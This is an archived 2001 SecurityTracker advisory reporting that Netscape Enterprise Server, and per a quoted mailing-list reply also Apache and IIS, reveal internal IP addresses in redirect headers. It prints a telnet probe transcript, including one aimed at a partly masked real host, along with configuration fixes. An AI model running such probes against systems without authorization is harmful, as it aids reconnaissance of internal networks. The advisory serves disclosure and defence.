SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Enterprise Server (Netscape) Vendors:   Netscape
Netscape Enterprise Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
SecurityTracker Alert ID:  1002189
SecurityTracker URL:  http://securitytracker.com/id/1002189
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 13 2001
Impact:   Disclosure of system information


Description:   It is reported that the Netscape Enterprise web server may disclose internal IP addresses used by the web server to remote users.

The following exploit transcript demonstrates the issue, where internal IP addresses used by the web server are displayed in the 'location' field:

telnet [targethost] 80

Trying XXX.XXX.XXX.XX...
Connected to [targethost]
Escape character is '^]'.
GET /images HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/3.6 SP3
Date: Fri, 10 Aug 2001 07:10:32 GMT
Location: http://172.16.128.117/images/
Content-length: 0
Content-type: text/html
Connection: close

Connection closed by foreign host.

Impact:   A remote user can obtain internal IP addresses used by the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  home.netscape.com/enterprise/v3.6/index.html (Links to External Site)
Cause:   State error
Underlying OS:  UNIX (AIX), UNIX (HP/UX), UNIX (SGI/IRIX), UNIX (Solaris - SunOS), UNIX (Tru64), Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Re: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


This problem also affects Apache, Netscape Enterprise Server, 
and probably many others.

Apache responds this way if the ServerName directive is not
set (or is set to the internal IP) and the UseCanonicalName 
option is On (which is the default configuration).  

>From Apache 1.3.x httpd.conf:

# UseCanonicalName:  (new for 1.3)  With this setting turned on, whenever
# Apache needs to construct a self-referencing URL (a URL that refers back
# to the server the response is coming from) it will use ServerName and
# Port to form a "canonical" name.  With this setting off, Apache will
# use the hostname:port that the client supplied, when possible.  This
# also affects SERVER_NAME and SERVER_PORT in CGI scripts.
#
UseCanonicalName Off

If ServerName is not set, the system will redirect users to what it 
thinks its hostname is (hostname.local, host.internal.net, etc). The
Fix is to either set CanonicalName to Off or set the ServerName 
variable to the external hostname.

I don't have a local NES system to check, but this demonstrates this
problem fairly effectively ;)

telnet www.verXXXgn.com 80
Trying 216.1X8.XXX.XX...
Connected to the.warmfuzzyofinternettrust.com.
Escape character is '^]'.
GET /images HTTP/1.0
 
HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/3.6 SP3
Date: Fri, 10 Aug 2001 07:10:32 GMT
Location: http://172.16.128.117/images/
Content-length: 0
Content-type: text/html
Connection: close
 
Connection closed by foreign host.






On Thu, 9 Aug 2001 13:22:39 -0700
"Marc Maiffret" <marc@eeye.com> wrote:

> this isnt just for HTTPS... this can occur on plain HTTP also depending on
> how someone has setup. If you have an IIS web server you should not use "all
> ip addresses" for a web and instead pick the specific IP so that way IIS
> does not accidently return internal IP's etc....
> 
> Signed,
> Marc Maiffret

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC